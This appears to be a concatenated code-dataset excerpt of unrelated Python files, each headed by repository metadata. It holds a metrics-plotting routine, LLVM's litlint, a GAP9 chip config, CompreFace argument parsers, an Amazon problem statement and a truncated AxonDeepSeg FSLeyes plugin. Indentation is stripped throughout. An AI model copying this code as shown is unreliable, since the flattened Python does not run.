task_algo_results = task_results[i_algo] # n_runs x n_eval_points
result_medians = np.median(task_algo_results, axis=0)
result_quartile1 = np.percentile(task_algo_results, q=25, axis=0)
result_quartile3 = np.percentile(task_algo_results, q=75, axis=0)
plt.plot(eval_point_values, result_medians, algo_color,
marker=MARKERS[i_algo])
plt.fill_between(
eval_point_values,
result_quartile1,
result_quartile3,
alpha=0.3,
color=algo_color)
if self.subplot_axis_labels:
plt.xlabel('evaluation points', fontsize=16)
plt.ylabel('metric values', fontsize=16)
else:
raise ValueError('result_dims must be ATP or ATRP, not %s' %
result_dims)
plot_utils.simple_axis(plt.gca())
plt.title(self.data_def.tasks[i_task])
# plot the legend
if self.make_legend:
plt.subplot(subplot_nrow_1, subplot_ncol_1, n_subplots_1)
self._lineplot_legend()
##=== Plot 2: Mean rankings (mean across tasks) ===##
for timeframe in range(self.n_timeframes):
# Load data for plotting.
timeframe_points = stats_runner.get_timeframe_points(timeframe)
pvals = self._load_pvals(metric, timeframe)
confidence_intervals = self._load_confidence_intervals(
metric, stats_runner, timeframe)
plt.figure(fig2.number)
metric_results = stats_runner.load_metric_results(
self.algorithms, timeframe_points, collapse_on_timepoints=True)
plt.subplot(subplot_nrow_2, subplot_ncol_2, timeframe + 1)
self._plot_bars_and_significant_differences(metric_results, pvals,
confidence_intervals,
stats_runner)
plt.title(TIMEFRAME_NAMES[timeframe], fontsize=14)
# plot the legend
if self.make_legend:
plt.subplot(subplot_nrow_2, subplot_ncol_2, subplot_ncol_2)
self._barplot_legend()
##=== Wrap up the figures ===##
for fig, plot_name in [(fig1, 'per-task_raw'), (fig2, 'mean_rankings')]:
if plot_name == 'per-task_raw':
suptitle_suffix = (
UP_ARROW if stats_runner.bigger_is_better else DOWN_ARROW)
else:
suptitle_suffix = ''
plt.figure(fig.number, plot_name)
self._wrap_up_figure(metric, plot_name, suptitle_suffix)
def _make_plots_no_eval_points(self, metric, stats_runner):
"""Make plots for a metric without evaluation points (one value per run).
e.g. 'ATR' metrics.
Plot 1: Raw metric values per task.
* One subplot per task.
* Each subplot contains a box-and-whisker plot showing the median metric
values for each algorithm, a box indicating 1st and 3rd quartiles, and
whiskers indicating the minimum and maximum values (excluding outliers,
defined as being outside 1.5x the inter-quartile range from the 1st and 3rd
quartiles).
Plot 2: Mean rankings across tasks.
* One bar plot showing the mean ranking for each algorithm, and horizontal
line segments indicating which pairs of algorithms are statistically
different.
Args:
metric: String specifying the metric.
stats_runner: StatsRunner object
"""
# Load data for plotting.
metric_results = stats_runner.load_metric_results(
self.algorithms, timeframe_points=None)
pvals = self._load_pvals(metric)
confidence_intervals = self._load_confidence_intervals(metric, stats_runner)
##=== Plot 1: Raw metric values per task ===##
# Set up figure.
subplot_ncol = 4
n_subplot = self.n_task
if self.make_legend:
n_subplot += 1
subplot_nrow = math.ceil(n_subplot / subplot_ncol)
plt.figure(figsize=(4 * subplot_ncol, 4 * subplot_nrow))
# Plot the raw metric values as box-and-whisker plots.
for i_task in range(self.n_task):
plt.subplot(subplot_nrow, subplot_ncol, i_task + 1)
task_results = np.squeeze(metric_results[:, i_task, :])
boxplot = plt.boxplot(task_results.T, patch_artist=True)
for part in ['boxes', 'whiskers', 'fliers', 'means', 'medians', 'caps']:
plt.setp(boxplot[part], color='k')
for i_patch, patch in enumerate(boxplot['boxes']):
patch.set(facecolor=ALGO_COLORS[i_patch])
plt.title(self.data_def.tasks[i_task], fontsize=16)
self._configure_axes('Raw metric values')
self._extend_ylims_past_zero(task_results)
plot_utils.simple_axis(plt.gca())
if self.make_legend:
plt.subplot(subplot_nrow, subplot_ncol, n_subplot)
self._barplot_legend()
# Wrap up the figure.
suptitle_suffix = (
UP_ARROW if stats_runner.bigger_is_better else DOWN_ARROW)
self._wrap_up_figure(
metric, plot_name='per-task_raw', suptitle_suffix=suptitle_suffix)
##=== Plot 2: Mean rankings (mean across tasks) ===##
# Set up figure.
subplot_ncol = 2 if self.make_legend else 1
subplot_nrow = 1
plt.figure(figsize=(4 * subplot_ncol, 4 * subplot_nrow))
# Plot mean rankings and show statistical differences
plt.subplot(subplot_nrow, subplot_ncol, 1)
self._plot_bars_and_significant_differences(metric_results, pvals,
confidence_intervals,
stats_runner)
plot_utils.simple_axis(plt.gca())
# plot the legend
if self.make_legend:
plt.subplot(subplot_nrow, subplot_ncol, subplot_ncol)
self._barplot_legend()
# Wrap up the figure.
self._wrap_up_figure(metric, plot_name='mean_rankings')
def _wrap_up_figure(self, metric, plot_name, suptitle_suffix=''):
"""Add suptitle, set tight layout, and save the figure."""
plt.suptitle(
plot_utils.METRICS_DISPLAY_NAMES[metric] + suptitle_suffix, fontsize=14)
plt.tight_layout(rect=[0, 0.03, 1, 0.95])
if self.out_dir:
self._save_fig(metric, plot_name)
def _load_pvals(self, metric, timeframe=None):
"""Load previously computed p-values.
Args:
metric: Which metric we are plotting.
timeframe: Which timeframe we are plotting. Set None if irrelevant (for
metrics that are not evaluated at specific eval points).
Returns:
Dictionary of p-values, with entries {'algo1.algo2': pval}
"""
pvals = {}
for algo1 in self.algorithms:
for algo2 in self.algorithms:
# Get path to p-value
pvals_filepath = ('%s/%s_%s_%s' %
(self.pvals_dir, metric, algo1, algo2))
if timeframe is not None:
pvals_filepath += '_%d' % timeframe
# Load the p-value
with open(pvals_filepath, 'r') as f:
pval = float(f.readline())
pvals['%s.%s' % (algo1, algo2)] = pval
logging.info('P-values loaded:')
logging.info(pvals)
return pvals
def _load_confidence_intervals(self, metric, stats_runner, timeframe=None):
"""Load previously computed confidence intervals.
Args:
metric: Which metric we are plotting.
stats_runner: StatsRunner object
timeframe: Which timeframe we are plotting. Set None if irrelevant (for
metrics that are not evaluated at specific eval points).
Returns:
Dictionary of confidence intervals, with entries
{'algo': [ci_lower, ci_upper]}
"""
cis = {}
for algo in self.algorithms:
# Get path to confidence intervals
ci_filepath = '%s/%s_%s' % (self.confidence_intervals_dir, metric, algo)
if timeframe is not None:
ci_filepath += '_%d' % timeframe
# Load the p-value
with open(ci_filepath, 'r') as f:
line = f.readline()
ci = list(map(float, line.split(',')))
# Normalize to range (1, n_metrics)
if 'R' in stats_runner.result_dims:
ci[0] /= self.data_def.n_runs_per_experiment
ci[1] /= self.data_def.n_runs_per_experiment
cis[algo] = ci
logging.info('Confidence intervals loaded:')
logging.info(cis)
return cis
def _plot_bars_and_significant_differences(self, metric_results, pvals,
confidence_intervals,
stats_runner):
"""For a single timeframe, plot mean rank and show significant differences.
Args:
metric_results: Numpy array with metric values. First two dimensions
should be (n_algorithm, n_task)
pvals: p-values on comparison between each pair of algorithms. A dict with
entries {'algo1.algo2': pvalue}.
confidence_intervals: Confidence intervals on mean rank for each
algorithm. A dict with entries {'algo': [ci_lower, ci_upper]}.
stats_runner: StatsRunner object
"""
ymax = 1.32 * (len(self.algorithms))
y_pval_lines = 0.83
# First get the rankings across all algos
metric_ranks = stats_runner.rank_per_task(metric_results)
# Get mean ranks over tasks, for each algo
# (collapse across all other dimensions)
extra_dims = range(1, len(metric_ranks.shape))
mean_ranks = np.mean(metric_ranks, tuple(extra_dims))
# Normalize the ranks to range (1, n_algorithms)
if 'R' in stats_runner.result_dims:
mean_ranks /= self.data_def.n_runs_per_experiment
# Plot the mean rankings and error bars for each algo
for i_algo, algo in enumerate(self.algorithms):
plot_utils.flipped_errorbar(
x=i_algo,
y=mean_ranks[i_algo],
yerr=confidence_intervals[algo],
ymax=self.n_algo,
bar_color=ALGO_COLORS[i_algo],
hatch_pattern=HATCH_PATTERNS[i_algo],
x_offset=0.6,
)
# Rank order the p-values.
if self.multiple_comparisons_method != 'bonferroni':
# Get subset of the p-values: we don't need the reverse comparisons, and
# we don't need the self comparisons.
pvals_subset = {}
for i_algo, algo1 in enumerate(self.algorithms):
for j_algo in range(i_algo + 1, self.n_algo):
algo2 = self.algorithms[j_algo]
algo_str = '%s.%s' % (algo1, algo2)
pvals_subset[algo_str] = pvals[algo_str]
sorted_keys = sorted(pvals_subset, key=pvals_subset.get)
pval_ranks = {key: rank for rank, key in enumerate(sorted_keys)}
# Plot black bars indicating significant differences.
n_lines_plotted = 0
for i_algo, algo1 in enumerate(self.algorithms):
for j_algo in range(i_algo + 1, self.n_algo):
algo2 = self.algorithms[j_algo]
algo_pair_str = '%s.%s' % (algo1, algo2)
if self.multiple_comparisons_method != 'bonferroni':
pval_rank = pval_ranks[algo_pair_str]
pthresh_corrected = self.pthresh_corrected[pval_rank]
else:
pthresh_corrected = self.pthresh_corrected
if pvals[algo_pair_str] < pthresh_corrected:
x = [i_algo + 1, j_algo + 1]
y = [(y_pval_lines + n_lines_plotted * 0.03) * ymax] * 2
plt.plot(x, y, color='k')
n_lines_plotted += 1
self._configure_axes('normalized mean rank', range(1, self.n_algo + 1),
range(self.n_algo, 0, -1))
def _configure_axes(self, y_label, y_ticks=None, y_tick_labels=None):
"""Configure axis limits and labels."""
algo_abbreviations = [
plot_utils.ALGO_ABBREVIATIONS[algo] for algo in self.algorithms
]
plt.xticks(range(1, self.n_algo + 1), algo_abbreviations)
plt.xlim(0, len(self.algorithms) + 1)
if y_ticks:
plt.yticks(y_ticks)
if y_tick_labels:
plt.gca().set_yticklabels(y_tick_labels)
if self.subplot_axis_labels:
plt.xlabel('algorithm', fontsize=16)
plt.ylabel(y_label, fontsize=16)
plt.tick_params(top='off')
@staticmethod
def _extend_ylims_past_zero(data, tolerance=0.01, extension=0.1):
"""Extend y-axis to ensure that zero-values in the data are visible.
Args:
data: Data being plotted.
tolerance: Determines what values are considered too close to zero.
extension: Determines how far to extend the y-axis.
"""
ylims_orig = plt.gca().get_ylim()
abs_min = np.abs(np.min(data))
abs_max = np.abs(np.max(data))
# Extend below zero.
if abs_min < tolerance * abs_max:
ylim_lower = -ylims_orig[1] * extension
plt.ylim([ylim_lower, ylims_orig[1]])
# Extend above zero.
elif abs_max < tolerance * abs_min:
ylim_upper = -ylims_orig[0] * extension
plt.ylim([ylims_orig[0], ylim_upper])
def _barplot_legend(self):
"""Plot a legend showing the color/texture for each algorithm."""
for ibox in range(self.n_algo):
box_y = self.n_algo - ibox
plt.scatter(
0,
box_y,
s=300,
marker='s',
facecolor=ALGO_COLORS[ibox],
edgecolor='k',
hatch=HATCH_PATTERNS[ibox],
label=HATCH_PATTERNS[ibox])
plt.text(0.008, box_y - 0.15, self.algorithms[ibox], fontsize=14)
plt.xlim(-0.01, 0.05)
plot_utils.no_axis(plt.gca())
def _lineplot_legend(self):
"""Plot a legend showing the color/marker for each algorithm."""
for i_algo in range(self.n_algo):
y = self.n_algo - i_algo
color = ALGO_COLORS[i_algo]
plt.plot([0, 2], [y, y], color=color)
plt.plot(1, y, marker=MARKERS[i_algo], color=color)
plt.text(2.5, y - 0.002, self.algorithms[i_algo], fontsize=14)
ax = plt.gca()
plot_utils.no_axis(ax)
ax.set_axis_bgcolor('white')
plt.xlim([0, 10])
plt.ylim([0, self.n_algo + 1])
|
compiler-rt/lib/sanitizer_common/scripts/litlint.py | medismailben/llvm-project | 8,865 | 12686782 | #!/usr/bin/env python
#
# litlint
#
# Ensure RUN commands in lit tests are free of common errors.
#
# If any errors are detected, litlint returns a nonzero exit code.
#
import optparse
import re
import sys
# Compile regex once for all files
runRegex = re.compile(r'(?<!-o)(?<!%run) %t\s')
def LintLine(s):
""" Validate a line
Args:
s: str, the line to validate
Returns:
Returns an error message and a 1-based column number if an error was
detected, otherwise (None, None).
"""
# Check that RUN command can be executed with an emulator
m = runRegex.search(s)
if m:
start, end = m.span()
return ('missing %run before %t', start + 2)
# No errors
return (None, None)
def LintFile(p):
""" Check that each RUN command can be executed with an emulator
Args:
p: str, valid path to a file
Returns:
The number of errors detected.
"""
errs = 0
with open(p, 'r') as f:
for i, s in enumerate(f.readlines(), start=1):
msg, col = LintLine(s)
if msg != None:
errs += 1
errorMsg = 'litlint: {}:{}:{}: error: {}.\n{}{}\n'
arrow = (col-1) * ' ' + '^'
sys.stderr.write(errorMsg.format(p, i, col, msg, s, arrow))
return errs
if __name__ == "__main__":
# Parse args
parser = optparse.OptionParser()
parser.add_option('--filter') # ignored
(options, filenames) = parser.parse_args()
# Lint each file
errs = 0
for p in filenames:
errs += LintFile(p)
# If errors, return nonzero
if errs > 0:
sys.exit(1)
|
utils/gap_configs/python/gap/gap9/gap9.py | 00-01/gap_sdk | 118 | 12686788 | #
# Copyright (C) 2020 GreenWaves Technologies
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import gsystree as st
from gap.gap9.soc import Soc
from gap.gap9.cluster import Cluster, get_cluster_name
from ips.clock.clock_domain import Clock_domain
from ips.clock.clock_generator import Clock_generator
from ips.pmu.pmu_v4 import Pmu
from ips.padframe.padframe_v1 import Padframe
from ips.vendors.dolphin.rtc import Rtc
class Gap9(st.Component):
def __init__(self, parent, name, soc_config_file='gap/gap9/soc.json', cluster_config_file='gap/gap9/cluster.json', padframe_config_file='gap/gap9/padframe.json'):
super(Gap9, self).__init__(parent, name)
#
# Properties
#
soc_config_file = self.add_property('soc_config_file', soc_config_file)
cluster_config_file = self.add_property('cluster_config_file', cluster_config_file)
nb_cluster = self.add_property('nb_cluster', 1)
#
# Components
#
# Padframe
padframe = Padframe(self, 'padframe', config_file=padframe_config_file)
# Soc clock domain
soc_clock = Clock_domain(self, 'soc_clock_domain', frequency=50000000)
# Clusters clock domains
cluster_clocks = []
for cid in range(0, nb_cluster):
cluster_name = get_cluster_name(cid)
cluster_clocks.append(Clock_domain(self, cluster_name + '_clock', frequency=50000000))
# Clusters
clusters = []
for cid in range(0, nb_cluster):
cluster_name = get_cluster_name(cid)
clusters.append(Cluster(self, cluster_name, config_file=cluster_config_file, cid=cid))
# Soc
soc = Soc(self, 'soc', config_file=soc_config_file, chip=self, cluster=clusters[0])
# Fast clock
fast_clock = Clock_domain(self, 'fast_clock', frequency=24576063*2)
fast_clock_generator = Clock_generator(self, 'fast_clock_generator', powered_on=False, powerup_time=200000000)
# Ref clock
ref_clock = Clock_domain(self, 'ref_clock', frequency=65536)
ref_clock_generator = Clock_generator(self, 'ref_clock_generator')
# PMU
pmu = Pmu(self, 'pmu', config_file='gap/gap9/pmu.json')
# RTC
rtc = Rtc(self, 'rtc', **soc.get_property('soc/peripherals/rtc/config'))
#
# Bindings
#
# Padframe
self.bind(ref_clock_generator, 'clock_sync', padframe, 'ref_clock_pad')
self.bind(padframe, 'ref_clock', soc, 'ref_clock')
for name, group in padframe.get_property('groups').items():
pad_type = group.get('type')
nb_cs = group.get('nb_cs')
is_master = group.get('is_master')
is_slave = group.get('is_slave')
is_dual = group.get('is_dual')
if pad_type == 'gpio':
self.bind(padframe, name + '_pad', soc, name)
else:
if is_master:
self.bind(soc, name, padframe, name)
if is_dual:
self.bind(padframe, name + '_in', soc, name + '_in')
if is_slave:
self.bind(padframe, name, soc, name)
if is_dual:
self.bind(soc, name + '_out', padframe, name + '_out')
if nb_cs is not None:
for cs in range(0, nb_cs):
cs_name = name + '_cs' + str(cs)
cs_data_name = name + '_cs' + str(cs) + '_data'
if is_master:
self.bind(padframe, cs_data_name + '_pad', self, cs_data_name)
self.bind(padframe, cs_name + '_pad', self, cs_name)
if is_slave:
self.bind(self, cs_data_name, padframe, cs_data_name + '_pad')
self.bind(self, cs_name, padframe, cs_name + '_pad')
else:
if is_master:
self.bind(padframe, name + '_pad', self, name)
if is_slave:
self.bind(self, name, padframe, name + '_pad')
# Soc clock domain
self.bind(soc_clock, 'out', soc, 'clock')
# Clusters
for cid in range(0, nb_cluster):
cluster = clusters[cid]
self.bind(ref_clock_generator, 'clock_sync', cluster, 'ref_clock')
self.bind(cluster, 'dma_irq', soc, 'dma_irq')
for pe in range(0, clusters[0].get_property('nb_pe', int)):
self.bind(soc, 'halt_cluster%d_pe%d' % (cid, pe), cluster, 'halt_pe%d' % pe)
self.bind(cluster_clocks[cid], 'out', clusters[cid], 'clock')
self.bind(soc, get_cluster_name(cid) + '_fll', cluster_clocks[cid], 'clock_in')
self.bind(soc, get_cluster_name(cid) + '_input', clusters[cid], 'input')
self.bind(clusters[cid], 'soc', soc, 'soc_input')
# Soc
self.bind(soc, 'fast_clk_ctrl', fast_clock_generator, 'power')
self.bind(soc, 'ref_clk_ctrl', ref_clock_generator, 'power')
self.bind(soc, 'fll_soc_clock', soc_clock, 'clock_in')
# Fast clock
self.bind(fast_clock, 'out', fast_clock_generator, 'clock')
self.bind(fast_clock_generator, 'clock_sync', soc, 'fast_clock')
self.bind(fast_clock_generator, 'clock_ctrl', fast_clock, 'clock_in')
# Ref clock
self.bind(ref_clock, 'out', ref_clock_generator, 'clock')
# RTC
self.bind(rtc, 'apb_irq', soc, 'rtc_apb_irq')
self.bind(rtc, 'irq', soc, 'wakeup_rtc')
self.bind(rtc, 'event', soc, 'rtc_event_in')
self.bind(soc, 'rtc_input', rtc, 'input')
self.bind(soc_clock, 'out', rtc, 'clock')
self.bind(ref_clock_generator, 'clock_sync', rtc, 'ref_clock')
# PMU
self.bind(soc_clock, 'out', pmu, 'clock')
self.bind(soc, 'pmu_input', pmu, 'input')
self.bind(pmu, 'icu6_reset', clusters[0], 'reset')
self.bind(pmu, 'icu5_reset', soc, 'reset')
self.bind(ref_clock, 'out', pmu, 'ref_clock')
self.bind(pmu, 'event', soc, 'event')
self.bind(pmu, 'scu_ok', soc, 'scu_ok')
self.bind(pmu, 'picl_ok', soc, 'picl_ok')
self.bind(soc, 'wakeup_out', pmu, 'wakeup')
self.bind(soc, 'wakeup_seq', pmu, 'wakeup_seq')
# SOC
self.bind(self, 'bootsel', soc, 'bootsel')
self.bind(fast_clock, 'out', soc, 'fast_clock_out')
def gen_gtkw_conf(self, tree, traces):
if tree.get_view() == 'overview':
self.vcd_group(self, skip=True)
else:
self.vcd_group(self, skip=False)
|
embedding-calculator/src/services/flask_/parse_request_arg.py | Precistat/CompreFace | 1,779 | 12686801
# Copyright (c) 2020 the original author or authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
# or implied. See the License for the specific language governing
# permissions and limitations under the License.
from flask import Request
from src.exceptions import InvalidRequestArgumentValueError
UNDEFINED = '__UNDEFINED__'
def parse_request_bool_arg(name: str, default: bool, request: Request) -> bool:
param_value = request.args.get(name.lower(), UNDEFINED).upper()
if param_value == UNDEFINED:
return default
if param_value in ('TRUE', '1'):
return True
elif param_value in ('FALSE', '0'):
return False
else:
raise InvalidRequestArgumentValueError(f"'{name}' parameter accepts only 'true' (or '1') and 'false' (or '0')")
def parse_request_string_arg(name: str, default, allowed_values, request: Request) -> str:
name = name.lower()
param_value = request.args.get(name.lower(), UNDEFINED).upper()
if param_value == UNDEFINED:
return default
allowed_values = list(allowed_values)
if param_value not in allowed_values:
raise InvalidRequestArgumentValueError(f"'{name}' parameter accepts only '{', '.join(allowed_values)}' values")
return param_value
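# --- Illustrative usage (editor's sketch, not part of the original module) ---
# Inside a Flask view these helpers would typically be used as, e.g.:
#
#     threshold_check = parse_request_bool_arg('det_prob_threshold_check', False, request)
#     mode = parse_request_string_arg('mode', 'FAST', ('FAST', 'FULL'), request)
#
# The argument names and allowed values above are hypothetical. Note that the
# parsed value is upper-cased before comparison, so allowed_values should be
# given in upper case.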
|
amazon_problems/problem_13.py | loftwah/Daily-Coding-Problem | 129 | 12686803 | """This problem was asked by Amazon.
Given a pivot x, and a list lst, partition the list into three parts.
• The first part contains all elements in lst that are less than x
• The second part contains all elements in lst that are equal to x
• The third part contains all elements in lst that are larger than x
Ordering within a part can be arbitrary.
For example, given x = 10 and lst = [9, 12, 3, 5, 14, 10, 10], one partition may be `[9, 3, 5, 10, 10, 12, 14].
""" |
ads_plugin.py | wukathryn/axondeepseg | 115 | 12686830 | """
This is an FSLeyes plugin script that integrates AxonDeepSeg tools into FSLeyes.
Author : <NAME>
"""
import wx
import wx.lib.agw.hyperlink as hl
import fsleyes.controls.controlpanel as ctrlpanel
import fsleyes.actions.loadoverlay as ovLoad
import numpy as np
import nibabel as nib
from PIL import Image, ImageDraw, ImageOps
import scipy.misc
import json
from pathlib import Path
import AxonDeepSeg
from AxonDeepSeg.apply_model import axon_segmentation
from AxonDeepSeg.segment import segment_image
import AxonDeepSeg.morphometrics.compute_morphometrics as compute_morphs
from AxonDeepSeg import postprocessing, params, ads_utils
from config import axonmyelin_suffix, axon_suffix, myelin_suffix, index_suffix, axonmyelin_index_suffix
import math
from scipy import ndimage as ndi
from skimage import measure, morphology, feature
import tempfile
import openpyxl
import pandas as pd
import imageio
VERSION = "0.2.19"
class ADSsettings:
"""
This class handles everything related to the parameters used in the ADS plugin, including the frame for the settings
menu.
"""
def __init__(self, ads_control):
"""
Constructor for the ADSsettings class. Initializes the default settings.
:param ads_control: An instance of ADScontrol
:type ads_control: ADScontrol
"""
self.ads_control = ads_control
# Declare the settings used
self.overlap_value = 25
self.model_resolution = 0.01 # Unused
self.use_custom_resolution = False # Unused
self.custom_resolution = 0.07 # Unused
self.zoom_factor = 1.0
self.axon_shape = "circle"
def on_settings_button(self, event):
"""
This function creates the settings_frame (the settings menu). It is called when the 'settings' button has been
pressed.
"""
self.settings_frame = wx.Frame(self.ads_control, title="Settings", size=(600, 300))
frame_sizer_h = wx.BoxSizer(wx.VERTICAL)
# Add the overlap value to the settings menu
sizer_overlap_value = wx.BoxSizer(wx.HORIZONTAL)
overlap_value_tooltip = wx.ToolTip("Represents the number of pixels that overlap two patches of the image when "
"applying the prediction model")
sizer_overlap_value.Add(wx.StaticText(self.settings_frame, label="Overlap value (pixels): "))
self.overlap_value_spinCtrl = wx.SpinCtrl(self.settings_frame, min=0, max=100, initial=self.overlap_value)
self.overlap_value_spinCtrl.Bind(wx.EVT_SPINCTRL, self.on_overlap_value_changed)
self.overlap_value_spinCtrl.SetToolTip(overlap_value_tooltip)
sizer_overlap_value.Add(self.overlap_value_spinCtrl, flag=wx.SHAPED, proportion=1)
frame_sizer_h.Add(sizer_overlap_value)
# Add the zoom factor to the settings menu
sizer_zoom_factor = wx.BoxSizer(wx.HORIZONTAL)
zoom_factor_tooltip = wx.ToolTip("When applying the model, the pixel size of the image will be "
"multiplied by this number. The zoom factor does not affect the computation of morphometrics.")
sizer_zoom_factor.Add(wx.StaticText(self.settings_frame, label="Zoom factor: "))
self.zoom_factor_spinCtrlDouble = wx.SpinCtrlDouble(self.settings_frame, initial=self.zoom_factor, inc=0.0001)
self.zoom_factor_spinCtrlDouble.Bind(wx.EVT_SPINCTRLDOUBLE, self.on_zoom_factor_changed)
self.zoom_factor_spinCtrlDouble.SetToolTip(zoom_factor_tooltip)
sizer_zoom_factor.Add(self.zoom_factor_spinCtrlDouble, flag=wx.SHAPED, proportion=1)
frame_sizer_h.Add(sizer_zoom_factor)
# Add the axon shape selection
axon_shape_choices = ["circle", "ellipse"]
sizer_axon_shape = wx.BoxSizer(wx.HORIZONTAL)
axon_shape_tooltip = wx.ToolTip('Select what is the shape of the axons that will be considered when computing '
'the morphometrics. "circle" will use the equivalent diameter (diameter of a circle with the same area as the axon). '
'"ellipse" will use minor axis of a fitted ellipse as diameter.')
sizer_axon_shape.Add(wx.StaticText(self.settings_frame, label="Axon shape: "))
self.axon_shape_combobox = wx.ComboBox(
self.settings_frame,
choices=axon_shape_choices,
size=(100, 20),
value=self.axon_shape
)
self.axon_shape_combobox.Bind(wx.EVT_COMBOBOX, self.on_axon_shape_combobox_item_selected)
self.axon_shape_combobox.SetToolTip(axon_shape_tooltip)
sizer_axon_shape.Add(self.axon_shape_combobox, flag=wx.SHAPED, proportion=1)
frame_sizer_h.Add(sizer_axon_shape)
# Add the done button
sizer_done_button = wx.BoxSizer(wx.HORIZONTAL)
done_button = wx.Button(self.settings_frame, label="Done")
done_button.Bind(wx.EVT_BUTTON, self.on_done_button)
sizer_done_button.Add(done_button, flag=wx.SHAPED, proportion=1)
frame_sizer_h.Add(sizer_done_button)
self.settings_frame.SetSizer(frame_sizer_h)
self.settings_frame.Show()
def on_overlap_value_changed(self, event):
self.overlap_value = self.overlap_value_spinCtrl.GetValue()
def on_zoom_factor_changed(self, event):
self.zoom_factor = self.zoom_factor_spinCtrlDouble.GetValue()
def on_axon_shape_combobox_item_selected(self, event):
self.axon_shape = self.axon_shape_combobox.GetStringSelection()
def on_done_button(self, event):
# TODO: make sure every setting is saved
self.settings_frame.Close()
class ADScontrol(ctrlpanel.ControlPanel):
"""
This class is the object corresponding to the AxonDeepSeg control panel.
"""
def __init__(self, ortho, *args, **kwargs):
"""
This function initializes the control panel. It generates the widgets and adds them to the panel. It also sets
the initial position of the panel to the left.
:param ortho: This is used to access the ortho ops in order to turn off the X and Y canvas as well as the cursor
"""
ctrlpanel.ControlPanel.__init__(self, ortho, *args, **kwargs)
# Create the settings object
self.settings = ADSsettings(self)
# Add a sizer to the control panel
# This sizer will contain the buttons
sizer_h = wx.BoxSizer(wx.VERTICAL)
# Add the logo to the control panel
ADS_logo = self.get_logo()
sizer_h.Add(ADS_logo, flag=wx.SHAPED, proportion=1)
# Add the citation to the control panel
citation_box = wx.TextCtrl(
self, value=self.get_citation(), size=(100, 50), style=wx.TE_MULTILINE
)
sizer_h.Add(citation_box, flag=wx.SHAPED, proportion=1)
# Add a hyperlink to the documentation
hyper = hl.HyperLinkCtrl(
self, -1, label="Need help? Read the documentation", URL="https://axondeepseg.readthedocs.io/en/latest/"
)
sizer_h.Add(hyper, flag=wx.SHAPED, proportion=1)
# Define the color of button labels
button_label_color = (0, 0, 0)
# Add the image loading button
load_png_button = wx.Button(self, label="Load PNG or TIF file")
load_png_button.SetForegroundColour(button_label_color)
load_png_button.Bind(wx.EVT_BUTTON, self.on_load_png_button)
load_png_button.SetToolTip(wx.ToolTip("Loads a .png or .tif file into FSLeyes"))
sizer_h.Add(load_png_button, flag=wx.SHAPED, proportion=1)
# Add the mask loading button
load_mask_button = wx.Button(self, label="Load existing mask")
load_mask_button.SetForegroundColour(button_label_color)
load_mask_button.Bind(wx.EVT_BUTTON, self.on_load_mask_button)
load_mask_button.SetToolTip(
wx.ToolTip(
"Loads an existing axonmyelin mask into FSLeyes. "
"The selected image should contain both the axon and myelin masks. "
"The regions on the image should have an intensity of 0 for the background, "
"127 for the myelin and 255 for the axons. "
)
)
sizer_h.Add(load_mask_button, flag=wx.SHAPED, proportion=1)
# Add the model choice combobox
self.model_combobox = wx.ComboBox(
self,
choices=ads_utils.get_existing_models_list(),
size=(100, 20),
value="Select the modality",
)
self.model_combobox.SetForegroundColour(button_label_color)
self.model_combobox.SetToolTip(
wx.ToolTip("Select the modality used to acquire the image")
)
sizer_h.Add(self.model_combobox, flag=wx.SHAPED, proportion=1)
# Add the button that applies the prediction model
apply_model_button = wx.Button(self, label="Apply ADS prediction model")
apply_model_button.SetForegroundColour(button_label_color)
apply_model_button.Bind(wx.EVT_BUTTON, self.on_apply_model_button)
apply_model_button.SetToolTip(
wx.ToolTip("Applies the prediction model and displays the masks")
)
sizer_h.Add(apply_model_button, flag=wx.SHAPED, proportion=1)
# The Watershed button's purpose isn't clear. It is unavailable for now.
# # Add the button that runs the watershed algorithm
# run_watershed_button = wx.Button(self, label="Run Watershed")
# run_watershed_button.Bind(wx.EVT_BUTTON, self.on_run_watershed_button)
# run_watershed_button.SetToolTip(
# wx.ToolTip(
# "Uses a watershed algorithm to find the different axon+myelin"
# "objects. This is used to see if where are connections"
# " between two axon+myelin objects."
# )
# )
# sizer_h.Add(run_watershed_button, flag=wx.SHAPED, proportion=1)
# Add the fill axon tool
fill_axons_button = wx.Button(self, label="Fill axons")
fill_axons_button.SetForegroundColour(button_label_color)
fill_axons_button.Bind(wx.EVT_BUTTON, self.on_fill_axons_button)
fill_axons_button.SetToolTip(
wx.ToolTip(
"Automatically fills the axons inside myelin objects."
" THE MYELIN OBJECTS NEED TO BE CLOSED AND SEPARATED FROM EACH "
"OTHER (THEY MUST NOT TOUCH) FOR THIS TOOL TO WORK CORRECTLY."
)
)
sizer_h.Add(fill_axons_button, flag=wx.SHAPED, proportion=1)
# Add the save Segmentation button
save_segmentation_button = wx.Button(self, label="Save segmentation")
save_segmentation_button.SetForegroundColour(button_label_color)
save_segmentation_button.Bind(wx.EVT_BUTTON, self.on_save_segmentation_button)
save_segmentation_button.SetToolTip(
wx.ToolTip("Saves the axon and myelin masks in the selected folder")
)
sizer_h.Add(save_segmentation_button, flag=wx.SHAPED, proportion=1)
# Add compute morphometrics button
compute_morphometrics_button = wx.Button(self, label="Compute morphometrics")
compute_morphometrics_button.SetForegroundColour(button_label_color)
compute_morphometrics_button.Bind(wx.EVT_BUTTON, self.on_compute_morphometrics_button)
compute_morphometrics_button.SetToolTip(
wx.ToolTip(
"Calculates and saves the morphometrics to an excel and csv file. "
"Shows the indexes of the axons at the coordinates specified in the morphometrics file."
)
)
sizer_h.Add(compute_morphometrics_button, flag=wx.SHAPED, proportion=1)
# Add the settings button
settings_button = wx.Button(self, label="Settings")
settings_button.SetForegroundColour(button_label_color)
settings_button.Bind(wx.EVT_BUTTON, self.settings.on_settings_button)
sizer_h.Add(settings_button, flag=wx.SHAPED, proportion=1)
# Set the sizer of the control panel
self.SetSizer(sizer_h)
# Initialize the variables that are used to track the active image
self.png_image_name = []
